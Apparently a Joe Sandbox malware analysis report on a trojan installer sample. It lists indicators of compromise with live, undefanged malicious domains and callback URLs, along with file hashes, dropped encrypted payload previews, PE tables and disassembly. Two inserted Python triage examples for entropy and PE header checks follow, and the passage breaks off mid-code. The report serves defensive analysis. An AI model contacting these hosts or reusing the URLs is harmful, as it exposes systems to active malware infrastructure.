• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@14/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 29.4% (good quality ratio 26.5%)
• Quality average: 71.7%
• Quality standard deviation: 31.8%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
154.93.81.33 | PO09641.exe | malicious | www.cuntrera.com/or4i/?UL=ER-POL&r6t0=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HPFkzzYJu2aIwx/5yQ==
3.16.197.4 | New-Order 04758485.exe | malicious | www.iqomw.com/crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JH
  | 4si5VtPNTe.exe | malicious | www.topsych.com/bucw/?APw8=pHmd48aeJBSPZZ4oXPqMUa9iB+zw7o9633Qm6JoN2J/ksYljdm2ak3+3AB9oAE45NnYEmo/gHQ==&b62T=5jlLiNy09
  | BANK-ACCOUNT. NUMBER.PDF.exe | malicious | www.blockchainbiotech.com/bfos/?n6=RpHxKvXHpdiDbnbp&a2JT=nIGyaopHry7E6bdI+FTOLhsX82bxJb3FdwYLplkJtK7ddv9iNxe81y+/5BoFARz6j+UD
  | PRF00202156KMT.exe | malicious | www.yelloways.com/epns/?BZ_PRR=g1HyJk+wG0QMozlZ4pSFaEKPb4YO3nGzZZ5CcX3yDfnOXFLur8M6WBwA2Tz5ODgZyyZKu9K6pg==&ctxXOb=9rSHdNip5
  | Materialliste f#U00fcr Angebot.exe | malicious | www.gaixuexi.com/mbg/?d4tTFV0x=biSbQxXptFsFatGCwU6rH3jFlmn8/7PXCP5ApA8iXgWtFmg/kZZqbn1fxj5u3vE5BJvNMtq/NQ==&vP=9rQPzxEXvpg8-Jrp
  | 4LkSpeVqKR.exe | malicious | www.7chd.com/uoe8/?V2=LhqpTfJ8&rDHpw=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh
  | new order.xlsx | malicious | www.beachjunction.com/uoe8/?PbvtUz=UaWDVduFhUYoxBOntLFCG15pALMvw+tGTmrfHTf8nBW+JGuA66stVf5lwBUB/caHaGfK0Q==&-Z=zVeT
  | 2B0CsHzr8o.exe | malicious | www.herreramedical.com/bncm/?LXedv=rRFZcIV0o2WsZrj/H7Tic0eMA0JUK/5bHF3i9UX4kn8AQLz1xJTIlIEaZDDEVH8ZeF4M&lhv4=O0DPaJ7hHb34yZ
23.227.38.74 | 350969bc_by_Libranalysis.exe | malicious | www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih
  | New_Order.exe | malicious | www.charmboutiques.com/icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT
  | correct invoice.exe | malicious | www.lovereeko.com/s5cm/?Zh3XHBo=1FGxjFcj1FUPzS/D0SlDguBIAwatlX2WBNFXThGVt5K3dMRyhfFKBeUeQKKI53c+UOaemgtTFA==&Xv0Hzp=j0Dx
  | PP,Sporda.exe | malicious | www.buymobilia.com/ugtw/?CVvTU=eThLp0qHv8&-Z=EKeLO8zcMggvyAnqu6sC/Qc/mwltFAuWVzDVO+nGfwm2nIuXQAQy4fFMC2pIsww48MiRk2Tftg==
  | New Order.exe | malicious | www.thirdgenerationfarms.com/un8c/?l4=1bNDCf9Pbhw&a2MLWLu=K7pYdtPf1O8pkq5RJpQL9NxmcqWMJU+Ppy9tvWhY4bI/nVqWSKBoLDAkJ733m7sxbxGP
  | slot Charges.exe | malicious | www.melaniesalascosmetics.com/u8nw/?iL3=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+SduwRjnFtQLe2lQ==&z6A=7n3h7JeH
  | WAkePI6vWufG5Bb.exe | malicious | www.dtmfitwear.com/i3cn/?o6A=adsPEH&o81L=H7+d7rkdlFG2nJnRYlgPOAiJBnunM3J+jeKjPbRv+UYLXY3B67SpW8jkP/G3pjkkmaap
  | PO09641.exe | malicious | www.safegrinder.com/or4i/?UL=ER-POL&r6t0=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU39382eFE9bBmbj0G0Q==
  | PO#6275473, Shipping.exe | malicious | www.maluss.com/nyr/?znp8sT=8pwxRHeHx&hFN=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImUBZS4FtrISW
  | 4LkSpeVqKR.exe | malicious | www.funnyfootballmugs.com/uoe8/?rDHpw=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&V2=LhqpTfJ8
  | PO889876.pdf.exe | malicious | www.soberrituals.com/a7dr/?NTots4J=tjW8ooLTa1jsWUklWWMZll7OVycfhiXpLtdzqL9aLAWMUkY+/Iy+agj0kOGNTOmqAWvW&Ch9De=9rj01Zg0
  | Il nuovo ordine e nell'elenco allegato.exe | malicious | www.sunflowermoonstudio.com/3nop/
  | Order Euro 890,000.exe | malicious | www.salonandspaworld.com/nbg/?AnE=N0DpoDyPy2&GzuDf=pEf6xflKLJsdCsdUJB49tHY3u81x5ITOFjKvog1CNLboxxP0rMA1boKXAxg6YVhGFy4W
  | products order pdf .exe | malicious | www.vrolin.com/nt8e/?jfLlfJ=9rUhSLlxSB2&uR-lx=++xYuLJgoH6pp3kD7RvwfttHqcXzQyvEvUgnOCU49uNqHCcn0mAStAECI82CVhbRI5Zx
  | REVISED ORDER.exe | malicious | www.shamansmoke.com/owws/?uDKhk=JfrPs86HdHGxMH&0pn=sHG+rQoOJeG4yTomgNlDQDPnHQ0IPx4pk+i/lkC8Qh0EEzCngsrhrbrKo7rF6GEUFueH
  | NEW ORDER.exe | malicious | www.melaniesalascosmetics.com/u8nw/?GVIp=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+rCfQStxZqQLex2g==&tzr4=jlIXVLPHc
  | PROFORMA INVOICE210505133444.xlsx | malicious | www.krewdog.com/hci/?HxolvBpX=A66Wlw4/Hrn0D6Biie/ZwxRaZIzTFJAuk4a3Hyus0i/oquN3TyNySX6ptiaSdx39RKDNRw==&NpJ=fDH4E
  | Quotation_05052021.Pdf.exe | malicious | www.moondusht.com/ihmh/?jL30vv=24Imnj46Zwn2iPXFlicawvhA5pNJwcknz4KeGPUwn6tGSh+cC2AatXSx6EmNHHhT195k&K2MHFj=ExoxkhRpmdq0
  | MOe7vYpWXW.exe | malicious | www.riandmoara.com/op9s/
  | 08917506_by_Libranalysis.exe | malicious | www.marielivet.com/o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb

Domains

Match | Associated Sample Name / URL | Detection | Context
www.cuntrera.com | PO09641.exe | malicious | 154.93.81.33
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | New-Order 04758485.exe | malicious | 3.16.197.4
  | PURCHASE ORDER REQUIREMENT.exe | malicious | 3.16.197.4
  | 4si5VtPNTe.exe | malicious | 3.16.197.4
  | BANK-ACCOUNT. NUMBER.PDF.exe | malicious | 3.16.197.4
  | PRF00202156KMT.exe | malicious | 3.16.197.4
  | Materialliste f#U00fcr Angebot.exe | malicious | 3.16.197.4
  | FY9Z5TR6rr.exe | malicious | 13.59.53.244
  | KVYhrHPAgF.exe | malicious | 3.16.197.4
  | 4LkSpeVqKR.exe | malicious | 3.16.197.4
  | new order.xlsx | malicious | 3.16.197.4
  | Purchase Order-070POR044127.exe | malicious | 52.15.160.167
  | New order list.exe | malicious | 13.59.53.244
  | Request for Quotation.exe | malicious | 13.59.53.244
  | 2B0CsHzr8o.exe | malicious | 52.15.160.167
  | tgix.exe | malicious | 13.59.53.244
  | 8c2d96ab_by_Libranalysis.exe | malicious | 52.15.160.167
  | DHL Receipt_AWB811470484778.exe | malicious | 52.15.160.167
  | NEW ORDER.exe | malicious | 52.15.160.167
  | Quotation_05052021.Pdf.exe | malicious | 52.15.160.167
  | 945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exe | malicious | 3.14.18.91
www.booweats.com | INV74321.exe | malicious | 64.190.62.111
shops.myshopify.com | 350969bc_by_Libranalysis.exe | malicious | 23.227.38.74
  | New_Order.exe | malicious | 23.227.38.74
  | correct invoice.exe | malicious | 23.227.38.74
  | PP,Sporda.exe | malicious | 23.227.38.74
  | Purchase Order.exe | malicious | 23.227.38.74
  | PAYMENT INSTRUCTIONS COPY.exe | malicious | 23.227.38.74
  | New Order.exe | malicious | 23.227.38.74
  | slot Charges.exe | malicious | 23.227.38.74
  | WAkePI6vWufG5Bb.exe | malicious | 23.227.38.74
  | PO09641.exe | malicious | 23.227.38.74
  | PO#6275473, Shipping.exe | malicious | 23.227.38.74
  | 4LkSpeVqKR.exe | malicious | 23.227.38.74
  | PO889876.pdf.exe | malicious | 23.227.38.74
  | Il nuovo ordine e nell'elenco allegato.exe | malicious | 23.227.38.74
  | Order Euro 890,000.exe | malicious | 23.227.38.74
  | winlog.exe | malicious | 23.227.38.74
  | products order pdf .exe | malicious | 23.227.38.74
  | REVISED ORDER.exe | malicious | 23.227.38.74
  | e9777bb4_by_Libranalysis.exe | malicious | 23.227.38.74
  | NEW ORDER.exe | malicious | 23.227.38.74

ASN

Match | Associated Sample Name / URL | Detection | Context
NAMECHEAP-NETUS | First_stely_shit_open_please.exe | malicious | 199.188.200.202
  | 59c9f346_by_Libranalysis.xls | malicious | 198.54.114.131
  | c527325d_by_Libranalysis.xls | malicious | 198.54.114.131
  | CRPR7mRha6.exe | malicious | 198.54.122.60
  | W9YDH79i8G.exe | malicious | 198.54.122.60
  | Ko4zQgTBHv.exe | malicious | 198.54.122.60
  | Purchase Order.exe | malicious | 198.54.126.165
  | wed.doc | malicious | 198.54.122.60
  | ORDER CONFIRMATION.doc | malicious | 198.54.122.60
  | SecuriteInfo.com.Trojan.Packed2.43091.10004.exe | malicious | 198.54.122.60
  | 6e5c05e1_by_Libranalysis.exe | malicious | 198.54.122.60
  | RFQ Plasma cutting machine.doc | malicious | 198.54.122.60
  | Order 122001-220 guanzo.exe | malicious | 198.54.117.216
  | main_setup_x86x64.exe | malicious | 162.255.119.164
  | 00098765123POIIU.exe | malicious | 199.192.23.253
  | e8eRhf3GM0.xlsm | malicious | 185.61.154.27
  | 2021_May_Quotation_pdf.exe | malicious | 198.54.115.133
  | 337840b9_by_Libranalysis.exe | malicious | 198.54.122.60
  | Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | malicious | 198.54.117.212
  | Updated Order list -804333.exe | malicious | 198.54.115.56
POWERLINE-AS-APPOWERLINEDATACENTERHK | 457b22da_by_Libranalysis.exe | malicious | 156.252.96.189
  | New RFQ.exe | malicious | 154.92.64.253
  | PP,Sporda.exe | malicious | 160.124.137.188
  | Purchase Inquiry 11.05.2021.exe | malicious | 154.213.202.60
  | WAkePI6vWufG5Bb.exe | malicious | 154.215.87.72
  | PO09641.exe | malicious | 154.93.81.33
  | Purchase Order #330716o.exe | malicious | 154.88.205.33
  | original documents.exe | malicious | 154.220.41.208
  | SHIPPING DOCUMENT.exe | malicious | 154.220.41.208
  | c8080fbf_by_Libranalysis.rtf | malicious | 154.86.42.252
  | REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe | malicious | 154.220.41.208
  | O1E623TjjW.exe | malicious | 43.230.169.157
  | SWIT BANK PAPER PAYMENT.exe | malicious | 154.213.207.4
  | PO_29_00412.exe | malicious | 154.216.244.232
  | z5Wqivscwd.exe | malicious | 154.88.201.82
  | 8480fe6d_by_Libranalysis.exe | malicious | 154.88.208.8
  | S4gONKzrzB.exe | malicious | 154.216.85.54
  | PO17439.exe | malicious | 103.234.52.224
  | gunzipped.exe | malicious | 103.234.52.32
  | FORM C.xlsx | malicious | 160.124.11.194

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\2813qk5gv9ujz
Process: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
File Type: data
Category: dropped
Size (bytes): 164352
Entropy (8bit): 7.998901832297446
Encrypted: true
SSDEEP: 3072:4r3BCJ0FMjwgA0JMTxvUQEhWwlIeg7Gt7zukLKqe+vysSr8qato3:4dCJnY0y9sQEA97G9z3Kqe3r87W3
MD5: 7DC8AC6B34FFA64B971758694AADCB96
SHA1: 299F920FA6C052644823D3AB536775DF928EAF61
SHA-256: 8353AECFB2593B6AD57D8C7E7DB4B9B58AC0C270C8E84855DF7A2ED1BCF0D825
SHA-512: 4A1A77B9A533A29F8DC92C5DDDF1D2B6E06142B79894AC046809ADF2E596FD71149FD4FDF82EC0B2ADA875948419FF94A57B7C791BB8F3A7E13A3693EBE1A91D
Malicious: false
Reputation: low
Preview: ].#.CD.....S....P.~..q.Co.....*.J.[.Kv...L.&.;../.[O..j.l..'............I.....{.3UPH.^....[_....W*x....yY.5'.4\..k6..Z.L+........s..f......Y:...>.....e..]..q.>......J...O}...r..``..].>.a_.g=.y$...........P1.....[.....O.S.%<...$....g..w.U...YT..8.v.x..+.).#.|x...> ...e+.."_8..I.......o..Y...t..[...K...B...S...C.8G.G......V.|X...@s5.x....To..X..a...iLZ.X...".....DC.X../.."..K...V.z...*.HO..|$.R..o..I..!..R.a+..Y|r}A.B.[e.";8@.q..h4.'.".$..Q.p#...'&..'.D...\......A..."...I..E>..).=.....`').A\x.....<..5+.IP.q..r.<.]/.aq......gM.,.0.%....Q...X.@.}qX.T...o..\.E....2p..~...q6`r...8OV.......T........z..FW.5.I.3Y ....4.:-y..$.#.B.....ST....?!.................v.....B../...2-M../...T....|W.@..2..ym.JV.C..q)h.=_,.f.........a..@...x....O......W:..........).....I.....Ei-.r%^...^.......m.....{.e.N..A...,........B.n.u..#2.........)....o..t.....o...l.]....vLhc..F.%(Jx.iw_...0.d3.^./.9J....N...8.+E..Z`z..g\..7.0.Qq....h.......{......B.:@..,.>..e....uV

C:\Users\user\AppData\Local\Temp\fmkr8rw7aiu
Process: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.892632251148882
Encrypted: false
SSDEEP: 192:3fypqb9FA5bh1/B+0/TAGzniLTz/mMBQHd:36qbAbh1J+TYiLej
                                                                                  MD5:9268E0879F7214B79FDE4DA628A11B0A
                                                                                  SHA1:94B741267433C27BC46640A56CEF8BE3810E6F0F
                                                                                  SHA-256:FFEDC245B88C6FF98AB9EE1F71DA75BBD4B1944BB60F114D42C383DD9942647B
                                                                                  SHA-512:C8DDFAD01D14FA1C68ADB4CAAD3E8E456EBCBEC1DB9E3067E3E9252B1C5E7FF1CF2877D58B11EC922767BD214480C218544D94C12D2E908649998B357A78A407
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ....U.+W..C..OW..^.W?....w?.L.O..Q(R.A...?...w..:.....6DJL...L.....^*,*.}....pY[y................z|j...............@....#..1fP....3M1!F@....C3A1V.....cd1a......sbaa..Q...c..q..c:<*.9q...U........g)+I.....z|z.......Y......{ik......$.......... C.H$!.2U.h6.$ C.|$\R2e.L65D`sApd.2b.O..nDp.A...rb.O.f..p.Q.O........:<:.......JLY.......iki......Z\z....6................!FP....30.1V@/...#.Q1fPA...3`1a..3...cAq..E...c`qa..w..:0.....,JL.9...4e:;)....:JKZ.4.y|z.s........yZ[yr*.|j....P.!}.!.r....C.@"...l.!....CAH...D.....O........r...r.BU.....>......9;t.[..+..#.@........,.^#..Z\..y{i......_q5~{y.......".qE....B....#[.R.. ..D.v.i#+k..J.Q+.0.+.}.........s.....@.{...{.=;9../,*,...I.,:.S..)+I..Z\Z.R~.......X|!..'.f..{...H.............E..E..M1..U...../.._.e...:J..JP..Q........_..?......t.;:<....KIz........t..$.NIK...{z|z..?...;WZ\..{.{..ik.....;..B......@....R{"......B........X.....;.`..c........'...c....P.k...G,J..a{...9..;)+...A#SNY[.:..8...V..h....<.
                                                                                  C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):3.5950542702890798
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:Ss8QuwulW+QfPqgYyd0jPY703PCTYDb9dlITnMLNM:hmZzQ3iyog7ncDb9dEMLS
                                                                                  MD5:FEDB20F0FFDF6119BCE0B7430B2CBED1
                                                                                  SHA1:BF9DAB3E49CF209F8D338B7600451BB9B8F5464C
                                                                                  SHA-256:B24D4C68E856B6417FC51285E654AB86A4A0C92ECC6F639C71B6AC6DD7EDF61D
                                                                                  SHA-512:6FB2DAADC1650C788E00CDBAF32A97E03A7F4E485160D4A6AECBAA91C52CA595C2E586A866DF0839C0DE2DC89D0D07F0CAA7D94578391AC668FA91FAA872B4F6
                                                                                  Malicious:true
                                                                                  Antivirus:
• Antivirus: Metadefender, Detection: 26%
                                                                                  • Antivirus: ReversingLabs, Detection: 59%
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#xt.g..Ig..Ig..Ig..Iy..I.n.Ih..I@..If..I@..If..I@..If..IRichg..I........................PE..L...a..`...........!......................... ...............................@............@..........................$..M.... ...............................0..H.................................................... ...............................text...T........................... ..`.rdata....... ......................@..@.reloc..R....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
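The Entropy and Encrypted fields above are a triage heuristic, not proof of encryption: a tightly compressed archive scores just as high, and a file whose bulk is a low-entropy header can hide an encrypted blob behind an unremarkable overall score. The following is an added example (not part of the report or of Joe Sandbox) that computes the same 8-bit Shannon entropy, applies the Encrypted decision, and walks a buffer in fixed windows to locate the high-entropy region inside it. The 7.9 cutoff, the 7.5 window threshold and the sample buffer are assumptions made for the example.

```python
import math
from collections import Counter

# Cutoff above which a blob is treated as encrypted/compressed. The report's own
# cutoff is not published; 7.9 bits/byte is an assumed value that separates the
# three dropped files above (7.9989 flagged, 7.8926 and 3.5951 not).
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream,
    8.0 when all 256 byte values occur equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """Mirror of the report's Encrypted flag under the assumed threshold."""
    return shannon_entropy(data) > threshold


def high_entropy_regions(data: bytes, window: int = 1024, threshold: float = 7.5):
    """Locate embedded payloads: score fixed-size windows and return merged
    [(start, end)] byte ranges whose windows all exceed `threshold`.
    A trailing partial window is scored as-is, so very short tails are noisy."""
    regions = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if shannon_entropy(chunk) > threshold:
            end = off + len(chunk)
            if regions and regions[-1][1] == off:
                regions[-1] = (regions[-1][0], end)   # extend the previous run
            else:
                regions.append((off, end))
    return regions


# Constructed sample: a zero-filled header, a uniform (maximum-entropy) blob,
# then padding. It stands in for an installer stub carrying an encrypted payload.
SAMPLE = b"\x00" * 4096 + bytes(range(256)) * 16 + b"A" * 4096

if __name__ == "__main__":
    print(f"whole file: {shannon_entropy(SAMPLE):.4f} bits/byte, "
          f"encrypted={looks_encrypted(SAMPLE)}")
    print("high-entropy regions:", high_entropy_regions(SAMPLE))   # [(4096, 8192)]
```

Run against the whole constructed buffer the file scores well under the cutoff, while the window scan still isolates the blob at offsets 4096 to 8192; that is the case the single "Entropy (8bit)" number cannot express.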

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):6.821586500284818
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:1cec9342_by_Libranalysis.exe
                                                                                  File size:418969
                                                                                  MD5:1cec9342ac2c1f91201df672382672f2
                                                                                  SHA1:968ab56e042035a593279775308298cfdcdc0af7
                                                                                  SHA256:a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
                                                                                  SHA512:0aa688d114520cba9fa4559273dc65cf6142d1056e115da4552bb9ca09a866e838a1c58a7c1d916dd5be565b613211fbb21c12f92a48b202c7638863b9b2eb6c
                                                                                  SSDEEP:6144:59X0G4b5mFCQcGNYpmUIfvlQd+WSdCJnY0y9sQEA97G9z3Kqe3r87WQ:/0X5mFvcyYQhfvpW+Z197G9Kz3r89
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                                  File Icon

                                                                                  Icon Hash:2c5c9a72e286e871

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403348
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000184h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor ebx, ebx
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                  mov dword ptr [esp+20h], ebx
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [004080B8h]
                                                                                  call dword ptr [004080BCh]
                                                                                  and eax, BFFFFFFFh
                                                                                  cmp ax, 00000006h
                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                  je 00007F83A4CB5933h
                                                                                  push ebx
                                                                                  call 00007F83A4CB8A96h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5929h
                                                                                  push 00000C00h
                                                                                  call eax
                                                                                  mov esi, 004082A0h
                                                                                  push esi
                                                                                  call 00007F83A4CB8A12h
                                                                                  push esi
                                                                                  call dword ptr [004080CCh]
                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                  cmp byte ptr [esi], bl
                                                                                  jne 00007F83A4CB590Dh
                                                                                  push 0000000Bh
                                                                                  call 00007F83A4CB8A6Ah
                                                                                  push 00000009h
                                                                                  call 00007F83A4CB8A63h
                                                                                  push 00000007h
                                                                                  mov dword ptr [0042F424h], eax
                                                                                  call 00007F83A4CB8A57h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5931h
                                                                                  push 0000001Eh
                                                                                  call eax
                                                                                  test eax, eax
                                                                                  je 00007F83A4CB5929h
                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                  push ebp
                                                                                  call dword ptr [00408038h]
                                                                                  push ebx
                                                                                  call dword ptr [00408288h]
                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+38h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 00429850h
                                                                                  call dword ptr [0040816Ch]
                                                                                  push 0040A188h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x33b28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x33b28 | 0x33c00 | False | 0.497480751812 | data | 5.28997877298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
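Several header fields above only make sense read together. DLL Characteristics lists DYNAMIC_BASE, but Image File Characteristics lists RELOCS_STRIPPED and the BASERELOC directory is empty, so the loader has nothing to apply and the image always maps at 0x400000 (the absolute addresses in the entrypoint listing, such as 0042F42Ch, depend on exactly that). The "Is in Section" column is an RVA lookup against the section table, and .ndata has raw size 0 against a 0x8000 virtual size, so it occupies address space with nothing backing it on disk. The following added example (not part of the report) implements those cross-checks over the values from the tables above. The flag bit values are the standard PE ones; the wording of the findings is the example's own.

```python
# Relevant IMAGE_FILE_* / IMAGE_DLLCHARACTERISTICS_* bits from the PE spec.
FILE_RELOCS_STRIPPED = 0x0001
DLL_DYNAMIC_BASE = 0x0040
DLL_NX_COMPAT = 0x0100


def section_for_rva(sections, rva, section_alignment=0x1000):
    """Return the name of the section holding `rva`, or None (header or gap).
    A section occupies max(VirtualSize, SizeOfRawData) rounded up to
    SectionAlignment, which is how the loader lays it out: a section with raw
    size 0 still reserves VirtualSize bytes of address space."""
    for name, va, vsize, rawsize in sections:
        span = max(vsize, rawsize)
        span = -(-span // section_alignment) * section_alignment   # ceiling to alignment
        if va <= rva < va + span:
            return name
    return None


def aslr_effective(file_characteristics, dll_characteristics, basereloc_size):
    """DYNAMIC_BASE only requests ASLR; the loader can honour it only when the
    image carries a relocation table it can apply."""
    requested = bool(dll_characteristics & DLL_DYNAMIC_BASE)
    relocatable = not (file_characteristics & FILE_RELOCS_STRIPPED) and basereloc_size > 0
    return requested and relocatable


def triage(image_base, file_characteristics, dll_characteristics, directories, sections):
    """Cross-check header fields the way an analyst eyeballs them; returns findings."""
    findings = []
    basereloc = next((size for n, _, size in directories if n == "BASERELOC"), 0)
    if dll_characteristics & DLL_DYNAMIC_BASE and not aslr_effective(
            file_characteristics, dll_characteristics, basereloc):
        findings.append(f"DYNAMIC_BASE set but no relocations: image always maps at {image_base:#x}")
    if not dll_characteristics & DLL_NX_COMPAT:
        findings.append("NX_COMPAT clear: data pages may be executable")
    for name, rva, size in directories:
        if size and section_for_rva(sections, rva) is None:
            findings.append(f"{name} directory at {rva:#x} lies outside every section")
    for name, va, vsize, rawsize in sections:
        if rawsize == 0 and vsize:
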